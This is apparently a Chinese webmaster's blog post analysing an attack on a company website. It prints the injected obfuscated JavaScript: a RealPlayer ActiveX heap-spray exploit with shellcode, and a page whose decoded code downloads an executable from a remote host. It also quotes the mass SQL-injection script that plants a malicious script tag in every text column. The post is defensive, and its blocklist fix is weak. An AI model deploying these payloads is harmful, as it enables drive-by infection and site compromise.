鲜甜IT.Net

<SCRIPT LANGUAGE='JavaScript'>
function ResumeError() {
return true;
}
window.onerror = ResumeError;
</SCRIPT>
<SCRIPT LANGUAGE="JAVASCRIPT">
eval("\x.........\x0a")
</script>

evel执行的编码解开后是下面的程序：
eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String))

{while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace

(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('V v(){W l=p.U.o();3(l.e("r 6")==-1&&l.e("r 7")==-1)g;3(l.e("Q 5.")==-1)

g;s="R"+"X.I"+"Y"+"17.1";16{n=15 Z(s)}18(M){g}b=n.D("E");2="";h=d("%C%z%A%u");j(i=0;i<F*G;i++)2+="S";3(b.e("6.0.14.")==-1){3

(p.t.o()=="N-L")a=d("%K%H%f");8 3(p.t.o()=="19-13")a=d("%1b%1q%1p%f");8 g}8 3(b=="6.0.14.1s")a=d("%m%11%1n%f");8 3

(b=="6.0.14.1r")a=d("%m%11%u%f");8 3(b=="6.0.14.1t")a=d("%w%q%1u%f");8 3(b=="6.0.14.1o")a=d("%w%q%1d%f");8 3(b=="6.0.14.1a")

a=d("%1f%11%1g%m");8 g;3(b.e("6.0.10.")!=-1){j(i=0;i<4;i++)2=2+h;2=2+a}8 3(b.e("6.0.11.")!=-1){j(i=0;i<6;i++)2=2+h;2=2+a}8 3

(b.e("6.0.12.")!=-1){j(i=0;i<9;i++)2=2+h;2=2+a}8 3(b.e("6.0.14.")!=-1){j(i=0;i<10;i++)2=2+h;2=2+a}

y="1h\\\\1i";x="1j";k=2+y+x;1k(k.1m<1c)k+="1e";n.1l("c:\\\\B O\\\\J\\\\P.T",k,"",0,0)}v

();',62,93,'||Padding|if|||||else||ret|RealVersion||unescape|indexOf|60|return|JmpOver||for|PayLoad|user|63|Real|toLowerCase|

navigator|31|msie|VulObject|userLanguage|04|RealExploit|79|Shell|AdjESP|06|74|Program|75|PlayerProperty|PRODUCTVERSION|32|148

|a5||NetMeeting|7f|cn|error|zh|Files|TestSnd|nt|IER||wav|userAgent|function|var|PCtl|ERP|ActiveXObject||||us||new|try|Ctl|cat

ch|en|536|4f|0x8000|09|YuanGe|51|70|LLLL|XXXXXLD|TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIXkcdNkbUWLNkT44ubXvcKEpV

Nk3FGP7szUwCO9QYqQnMEckkp6FoMnWdThVXzRrTwxkqxKTMFcxZcpxkXoWKkoBUYwsnNk3nGTS3kmsVLKdL2klKQNwluSYMLK4DNkuSkuiS0uT2rLPmbOpnvNsTp

lrLc0QS5j1LRuVNPepxRE5PP3yPcTVcCpp0ahtLNksptLLK0p7llmNk1P5XxkViLKSpp4LMW0sLLKW0gLmEmonnbn4NHlXhOtKOKOkOosjLS4mSTlEtelKOHPLUv0

mogF7jVO0pZHPokOYo9oNkaD14ilLMpRLz7CKkPSPSpRHk7TBsKON0cmoOnxKNoz6nhhRsYokOkOncHluTOsfLwTE2YoJpMoqnIHkRPsM8qPiokO9oV2kOXPJHxWK

OYoIo2HD4cDbP5jdo4oqhD86NcQSHSWpzqrsQtnQspoRMToQgqgVOPb0r4nQu48qu7p|while|Import|length|08|543|a4|71|550|544|552|01'.split

('|'),0,{}))


http://htm1.ws/www/bd.htm页面


<html>
<OBJECT ID = "com" CLASSID = "CLSID:{A7F05EE4-0426-454F-8013-C41E3596E9E9}">
</OBJECT>
<SCRIPT LANGUAGE='JavaScript'>
function ResumeError() {
return true;
}
window.onerror = ResumeError;
</SCRIPT>
<script>
eval("\143\157\155\56\104\154\157\141\144\104\123\50\42\150\164\164\160\72\57\57\170\170\56\141\170\147\172\142\141\56\143

\157\155\57\167\167\57\167\145\142\62\56\143\141\142\42\54\40\42\167\145\142\56\145\170\145\42\54\40\60\51\73")
</script>
</html>

evel执行的编码解开后是下面的程序：
com.DloadDS("http://xx.axgzba.com/ww/web2.cab", "web.exe", 0);

在网上搜了搜<script src=http://ucmal.com/0.js></script>，那个人是是25下午开始入侵，看来我们也是第一批被攻破的，26号我们恢复数

据库之后正常，27号又次攻击，查找iis日志文件终于发现问题了，查到DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST

(0x4400450....AS%20NVARCHAR(4000));EXEC(@S)，搜了下上次看的帖子，有人回了，说的很正确，我用他

的方式实验了下，确实sql成功注入了，执行的sql语句为：
DECLARE @T varchar(255),
@C varchar(255)
DECLARE Table_Cursor CURSOR
FOR select a.name,
b.name
from sysobjects a,
syscolumns b
where a.id = b.id
and a.xtype = 'u'
and ( b.xtype = 99
or b.xtype = 35
or b.xtype = 231
or b.xtype = 167
)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T, @C
WHILE( @@FETCH_STATUS = 0 )
BEGIN
exec
( 'update [' + @T + '] set [' + @C + ']=rtrim(convert(varchar,['
+ @C + ']))+''<script src=http://ucmal.com/0.js></script>''' )
FETCH NEXT FROM Table_Cursor INTO @T, @C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
最后找其原因，我想我的conn文件里都有sql过滤啊，问什么没有过滤掉DECLARE呢，再看原来他是用的大写，我的sql过滤只过滤了小写，原因

就在这，郁闷，这么个问题都没考虑到，把传递的参数都转换成大写来过滤就没事了，问题终于解决了，受这攻击的人在26号时我在百度跟

google里搜也就2页，27在搜就猛增到十几页，一天不少网站被攻击，估计问题跟我的问题一样，没区分大小写。公司的网站是好了，我赶紧去改一下我的博客，在安全上再提高一下。

分享按钮